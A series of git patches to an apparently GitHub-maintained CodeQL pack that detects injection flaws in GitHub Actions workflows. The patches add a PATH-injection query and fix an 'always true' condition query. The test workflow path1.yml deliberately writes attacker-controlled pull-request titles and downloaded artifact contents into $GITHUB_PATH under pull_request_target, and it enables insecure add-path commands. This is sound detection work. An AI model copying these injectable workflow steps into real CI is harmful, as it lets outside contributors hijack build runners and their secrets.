i.getCondition().matches("%${{%") and diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c796ff5ee40..6259340a4a6 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.12 +version: 0.0.13 groups: - actions - queries From 9183fb0d808ca243a32634fbbc3a206342e5487d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 20 Apr 2024 23:31:08 +0200 Subject: [PATCH 0207/1267] Fix expression always true query --- ql/lib/qlpack.yml | 2 +- .../CWE-571/ExpressionIsAlwaysTrue.ql | 10 +++--- ql/src/qlpack.yml | 2 +- .../CWE-571/.github/workflows/test.yml | 35 +++++++++++++++++-- .../CWE-571/ExpressionIsAlwaysTrue.expected | 7 ++++ 5 files changed, 47 insertions(+), 9 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 4364e979f91..b557a60a751 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.13 +version: 0.0.14 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql index b631b5f17b3..58eab4c6022 100644 --- a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql @@ -1,4 +1,6 @@ /** + *: + * * @name If expression always true * @description Expressions used in If conditions with extra spaces are always true. * @kind problem @@ -16,10 +18,10 @@ import actions from If i where i.getCondition().matches("%${{%") and - i.getConditionStyle() = ["|", ">"] - or - i.getCondition().matches("%${{%") and - not i.getCondition().matches("${{%") + ( + not i.getCondition().matches("${{%") or + not i.getCondition().matches("%}}") + ) or count(i.getCondition().splitAt("${{")) > 2 select i, "Expression always evaluates to true" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6259340a4a6..99ecbe14d55 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.13 +version: 0.0.14 groups: - actions - queries diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml index 16b725b5ee8..30c4dcab932 100644 --- a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml @@ -8,7 +8,7 @@ jobs: process-pr: runs-on: ubuntu-latest steps: - - name: Test1 + - name: Test 1 if: 1 == 2 run: echo "Test 1 should not be printed" - name: Test 2 @@ -36,8 +36,8 @@ jobs: - name: Test 7 run: echo "Test 7 should not be printed" if: ${{ - 1 == 2 || - 3 == 4 + github.actor == 'torvalds' || + github.actor == 'dependabot[bot]' }} - name: Test 8 @@ -58,3 +58,32 @@ jobs: - name: Test 12 if: " ${{ 1 == 2 }}" run: echo "Test 12 should not be printed" + - name: Test 13 + if: | + 1 == 2 || + 3 == 4 + run: echo "Test 13 should not be printed" + - name: Test 14 + if: >- + ${{( + false || 1 == 2 + )}} + run: echo "Test 14 should not be printed" + - name: Test 15 + if: |- + ${{( + false || 1 == 2 + )}} + run: echo "Test 15 should not be printed" + - name: Test 16 + if: |+ + ${{( + false || 1 == 2 + )}} + run: echo "Test 16 should not be printed" + - name: Test 17 + if: >+ + ${{( + false || 1 == 2 + )}} + run: echo "Test 17 should not be printed" diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected new file mode 100644 index 00000000000..a8f068c9cd8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected @@ -0,0 +1,7 @@ +| .github/workflows/test.yml:15:13:19:13 | \| | Expression always evaluates to true | +| .github/workflows/test.yml:34:13:34:39 | ${{ 1 = ... == 2 }} | Expression always evaluates to true | +| .github/workflows/test.yml:45:13:48:24 | > | Expression always evaluates to true | +| .github/workflows/test.yml:56:15:56:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | +| .github/workflows/test.yml:59:15:59:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | +| .github/workflows/test.yml:79:13:82:14 | \|+ | Expression always evaluates to true | +| .github/workflows/test.yml:85:13:88:14 | >+ | Expression always evaluates to true | From ab7196ac5249f1acf711449d8874235fe4d4897b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 09:53:30 +0200 Subject: [PATCH 0208/1267] Fix FPs in EnvVarInjection --- .../actions/security/EnvVarInjectionQuery.qll | 18 ------------------ .../Security/CWE-077/EnvVarInjection.expected | 12 ------------ .../CWE-077/PrivilegedEnvVarInjection.expected | 16 ---------------- 3 files changed, 46 deletions(-) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index af155e9f3d7..7d95188cc8c 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -24,28 +24,10 @@ predicate envVarInjectionFromFileSink(DataFlow::Node sink) { ) } -/** - * Holds if a Run step declares an environment variable, uses it to declare a new env var. - * e.g. - * env: - * BODY: ${{ github.event.comment.body }} - * run: | - * echo "foo=$(echo $BODY)" >> $GITHUB_ENV - */ -predicate envVarInjectionFromEnvSink(DataFlow::Node sink) { - exists(Run run, Expression expr, string varName, string value | - sink.asExpr().getInScopeEnvVarExpr(varName) = expr and - run = sink.asExpr() and - Utils::writeToGitHubEnv(run, _, value) and - value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 - ) -} - private class EnvVarInjectionSink extends DataFlow::Node { EnvVarInjectionSink() { envVarInjectionFromExprSink(this) or envVarInjectionFromFileSink(this) or - envVarInjectionFromEnvSink(this) or externallyDefinedSink(this, "envvar-injection") } } diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 31a550e3756..0c4574a77cb 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -3,10 +3,6 @@ edges | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | -| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | -| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | -| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | -| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | @@ -16,13 +12,5 @@ nodes | .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:21:9:25:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:31:9:37:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:37:9:45:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 527808d10b0..6dbe7bf3c93 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -3,10 +3,6 @@ edges | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | -| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | -| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | -| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | -| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | @@ -16,14 +12,6 @@ nodes | .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:21:9:25:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:31:9:37:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:37:9:45:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | @@ -31,7 +19,3 @@ subpaths | .github/workflows/test2.yml:47:9:52:6 | Run Step | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:47:9:52:6 | Run Step | Run Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | -| .github/workflows/test4.yml:21:9:25:6 | Run Step | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:21:9:25:6 | Run Step | Run Step | -| .github/workflows/test4.yml:25:9:31:6 | Run Step | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:25:9:31:6 | Run Step | Run Step | -| .github/workflows/test4.yml:31:9:37:6 | Run Step | .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:31:9:37:6 | Run Step | Run Step | -| .github/workflows/test4.yml:37:9:45:6 | Run Step | .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:37:9:45:6 | Run Step | Run Step | From c31e9dde5e49faa2ab3561a5a13fae573a6bd58e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 16:19:56 +0200 Subject: [PATCH 0209/1267] Add EnvPathInjection query --- ql/lib/codeql/actions/Ast.qll | 22 ++++++ .../security/EnvPathInjectionQuery.qll | 68 +++++++++++++++++++ .../actions/security/EnvVarInjectionQuery.qll | 2 +- ql/src/Security/CWE-077/EnvPathInjection.ql | 32 +++++++++ .../CWE-077/PrivilegedEnvPathInjection.ql | 28 ++++++++ .../CWE-077/.github/workflows/path1.yml | 33 +++++++++ .../Security/CWE-077/EnvPathInjection.actual | 10 +++ .../Security/CWE-077/EnvPathInjection.qlref | 1 + 8 files changed, 195 insertions(+), 1 deletion(-) create mode 100644 ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll create mode 100644 ql/src/Security/CWE-077/EnvPathInjection.ql create mode 100644 ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml create mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual create mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 8a3dfb7b2a7..ac222741c02 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -89,6 +89,24 @@ module Utils { ) } + bindingset[line] + predicate extractPathAssignment(string line, string value) { + exists(string path | + // single path assignment + path = + line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_PATH(\\})?(\"|')?", + 2) and + value = trimQuotes(path) + or + // workflow command assignment + path = + line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::add-path::(.*)(\"|')?", 3) + .regexpReplaceAll("^\"", "") + .regexpReplaceAll("\"$", "") and + value = trimQuotes(path) + ) + } + predicate writeToGitHubEnv(Run run, string key, string value) { extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or extractMultilineAssignment(run.getScript(), "ENV", key, value) @@ -98,6 +116,10 @@ module Utils { extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) } + + predicate writeToGitHubPath(Run run, string value) { + extractPathAssignment(run.getScript().splitAt("\n"), value) + } } class AstNode instanceof AstNodeImpl { diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll new file mode 100644 index 00000000000..a5cf2d600f0 --- /dev/null +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -0,0 +1,68 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +private import codeql.actions.security.ArtifactPoisoningQuery +import codeql.actions.DataFlow + +predicate envPathInjectionFromExprSink(DataFlow::Node sink) { + exists(Expression expr, Run run, string value | + Utils::writeToGitHubPath(run, value) and + expr = sink.asExpr() and + run.getAnScriptExpr() = expr and + value.indexOf(expr.getExpression()) > 0 + ) +} + +predicate envPathInjectionFromFileSink(DataFlow::Node sink) { + exists(Run run, UntrustedArtifactDownloadStep step, string value | + sink.asExpr() = run and + step.getAFollowingStep() = run and + Utils::writeToGitHubPath(run, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) +} + +/** + * Holds if a Run step declares an environment variable, uses it to declare a PATH env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "$BODY" >> $GITHUB_PATH + */ +predicate envPathInjectionFromEnvSink(DataFlow::Node sink) { + exists(Run run, Expression expr, string varname, string value | + sink.asExpr().getInScopeEnvVarExpr(varname) = expr and + run = sink.asExpr() and + Utils::writeToGitHubPath(run, value) and + ( + value = ["$" + varname, "${" + varname + "}", "$ENV{" + varname + "}"] + or + value.matches("$(echo %") and value.indexOf(varname) > 0 + ) + ) +} + +private class EnvPathInjectionSink extends DataFlow::Node { + EnvPathInjectionSink() { + envPathInjectionFromExprSink(this) or + envPathInjectionFromFileSink(this) or + envPathInjectionFromEnvSink(this) or + externallyDefinedSink(this, "envpath-injection") + } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate an environment variable. + */ +private module EnvPathInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof EnvPathInjectionSink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate the PATH environment variable. */ +module EnvPathInjectionFlow = TaintTracking::Global; diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 7d95188cc8c..0ae333a56f5 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -10,7 +10,7 @@ predicate envVarInjectionFromExprSink(DataFlow::Node sink) { Utils::writeToGitHubEnv(run, key, value) and expr = sink.asExpr() and run.getAnScriptExpr() = expr and - value.indexOf(expr.getRawExpression()) > 0 + value.indexOf(expr.getExpression()) > 0 ) } diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjection.ql new file mode 100644 index 00000000000..19b4cf6c01b --- /dev/null +++ b/ql/src/Security/CWE-077/EnvPathInjection.ql @@ -0,0 +1,32 @@ +/** + * @name PATH Enviroment Variable built from user-controlled sources + * @description Building the PATH environment variable from user-controlled sources may alter the execution of following system commands + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/envpath-injection + * @tags actions + * security + * external/cwe/cwe-077 + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.EnvPathInjectionQuery +import EnvPathInjectionFlow::PathGraph + +from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink +where + EnvPathInjectionFlow::flowPath(source, sink) and + ( + exists(source.getNode().asExpr().getEnclosingCompositeAction()) + or + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + not w.isPrivileged() + ) + ) +select sink.getNode(), source, sink, + "Potential PATH environment variable injection in $@, which may be controlled by an external user.", + sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql new file mode 100644 index 00000000000..e9f55d1cbb2 --- /dev/null +++ b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql @@ -0,0 +1,28 @@ +/** + * @name PATH Enviroment Variable built from user-controlled sources + * @description Building the PATH environment variable from user-controlled sources may alter the execution of following system commands + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/privileged-envpath-injection + * @tags actions + * security + * external/cwe/cwe-077 + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.EnvPathInjectionQuery +import EnvPathInjectionFlow::PathGraph + +from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink +where + EnvPathInjectionFlow::flowPath(source, sink) and + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + w.isPrivileged() + ) +select sink.getNode(), source, sink, + "Potential privileged PATH environment variable injection in $@, which may be controlled by an external user.", + sink, sink.getNode().toString() diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml new file mode 100644 index 00000000000..d22f09c03bd --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml @@ -0,0 +1,33 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + + - run: echo "${{ github.event.pull_request.title }}" >> $GITHUB_PATH + - env: + PATHINJ: ${{ github.event.pull_request.title }} + run: echo $(echo "$PATHINJ") >> $GITHUB_PATH + - env: + PATHINJ: ${{ github.event.pull_request.title }} + run: echo $PATHINJ >> $GITHUB_PATH + - env: + PATHINJ: ${{ github.event.pull_request.title }} + run: echo ${PATHINJ} >> $GITHUB_PATH + - uses: dawidd6/action-download-artifact@v2 + with: + name: artifact_name + path: foo + - run: echo "$(cat foo/bar)" >> $GITHUB_PATH + - env: + ACTIONS_ALLOW_UNSECURE_COMMANDS: true + PATHINJ: ${{ github.event.pull_request.title }} + run: echo "::add-path::$PATHINJ" + + + + diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual new file mode 100644 index 00000000000..6d9801ccd81 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual @@ -0,0 +1,10 @@ +edges +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:9:26:6 | Run Step | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:26:9:29:41 | Run Step | +nodes +| .github/workflows/path1.yml:11:21:11:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/path1.yml:25:9:26:6 | Run Step | semmle.label | Run Step | +| .github/workflows/path1.yml:26:9:29:41 | Run Step | semmle.label | Run Step | +subpaths +#select diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref new file mode 100644 index 00000000000..ab36454942e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvPathInjection.ql From ef9583a92171ad1c8880e4200955613d98103d19 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 16:20:36 +0200 Subject: [PATCH 0210/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b557a60a751..94df84766b5 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.14 +version: 0.0.15 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 99ecbe14d55..60e21004b84 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.14 +version: 0.0.15 groups: - actions - queries From 61976c684eadace821972df4519516a202b83f56 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 23:28:58 +0200 Subject: [PATCH 0211/1267] Lower privilege checks to Jobs --- .github/action/src/codeql.ts | 7 +++ action.yml | 35 ++++++++++- ql/lib/codeql/actions/Ast.qll | 33 +--------- ql/lib/codeql/actions/ast/internal/Ast.qll | 63 +++++++++++++++++++ .../codeql/actions/dataflow/ExternalFlow.qll | 7 +++ .../internal/ExternalFlowExtensions.qll | 5 ++ .../ext/workflow-models/workflow-models.yml | 5 ++ ql/lib/qlpack.yml | 1 + ql/src/Security/CWE-077/EnvPathInjection.ql | 8 +-- ql/src/Security/CWE-077/EnvVarInjection.ql | 8 +-- .../CWE-077/PrivilegedEnvPathInjection.ql | 6 +- .../CWE-077/PrivilegedEnvVarInjection.ql | 6 +- ql/src/Security/CWE-078/CommandInjection.ql | 8 +-- .../CWE-078/PrivilegedCommandInjection.ql | 6 +- ql/src/Security/CWE-094/CodeInjection.ql | 8 +-- .../CWE-094/PrivilegedCodeInjection.ql | 6 +- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 8 +-- .../CWE-829/PrivilegedArtifactPoisoning.ql | 6 +- ql/test/library-tests/workflowenum.expected | 0 ql/test/library-tests/workflowenum.ql | 8 +++ ...ction.actual => EnvPathInjection.expected} | 0 .../.github/workflows/artifactpoisoning61.yml | 53 ++++++++++++++++ 22 files changed, 221 insertions(+), 66 deletions(-) create mode 100644 ql/lib/ext/workflow-models/workflow-models.yml create mode 100644 ql/test/library-tests/workflowenum.expected create mode 100644 ql/test/library-tests/workflowenum.ql rename ql/test/query-tests/Security/CWE-077/{EnvPathInjection.actual => EnvPathInjection.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 0fcdd81ee3f..e845ec9fd4f 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -147,6 +147,13 @@ export async function codeqlDatabaseAnalyze( codeql_output, ]; + const extPackPath = process.env["EXTPACK_PATH"]; + const extPackName = process.env["EXTPACK_NAME"]; + if (extPackPath !== undefined && extPackName !== undefined) { + cmd.push("--additional-packs", extPackPath); + cmd.push("--extension-packs", extPackName); + } + // remote pack or local pack if (codeql.pack.startsWith("githubsecuritylab/")) { var suite = codeql.pack + ":" + codeql.suite; diff --git a/action.yml b/action.yml index 9281212ea24..42141a1dd74 100644 --- a/action.yml +++ b/action.yml @@ -18,10 +18,41 @@ inputs: description: "CodeQL Suite to run" default: "actions-code-scanning" + workflow-models: + description: "Workflow models" + required: false + runs: using: 'composite' steps: - - name: Do something with context + - name: Process workflow models + shell: bash + if: inputs.workflow-models + run: | + // Create QLPack directory + mkdir workflow-extpack + cd workflow-extpack + + // Store the extension pack file + cat > models.yml << 'EOF' + ${{ inputs.workflow-models }} + EOF + + // Create QLPack + cat > qlpack.yml << 'EOF' + name: local/workflow-models + library: true + extensionTargets: + githubsecuritylab/actions-all: '*' + dataExtensions: + - models.yml + EOF + + // Set env vars + echo "EXTPACK_PATH=./workflow-extpack" >> $GITHUB_ENV + echo "EXTPACK_NAME=local/workflow-models" >> $GITHUB_ENV + + - name: Scan workflows shell: bash env: GITHUB_TOKEN: ${{ inputs.token }} @@ -29,5 +60,7 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} + EXTPACK_PATH: ${{ inputs.extpack-path }} + EXTPACK_NAME: ${{ inputs.extpack-name }} run: | node ${{ github.action_path }}/.github/action/dist/index.js diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index ac222741c02..7c4bf9aa8af 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -228,36 +228,7 @@ class Workflow extends AstNode instanceof WorkflowImpl { Strategy getStrategy() { result = super.getStrategy() } - predicate hasSingleTrigger(string trigger) { - this.getATriggerEvent() = trigger and - count(this.getATriggerEvent()) = 1 - } - - predicate isPrivileged() { - // The Workflow has a permission to write to some scope - this.getPermissions().getAPermission() = "write" - or - // The Workflow accesses a secret - exists(SecretsExpression expr | - expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" - ) - or - // The Workflow is triggered by an event other than `pull_request` - count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent() = ["pull_request", "workflow_call"] - or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - this.hasSingleTrigger("workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = this.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - caller.isPrivileged() - ) - or - // The Workflow has multiple triggers so at least one is ont "pull_request" - count(this.getATriggerEvent()) > 1 - } + predicate isPrivileged() { super.isPrivileged() } } class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { @@ -325,6 +296,8 @@ abstract class Job extends AstNode instanceof JobImpl { Permissions getPermissions() { result = super.getPermissions() 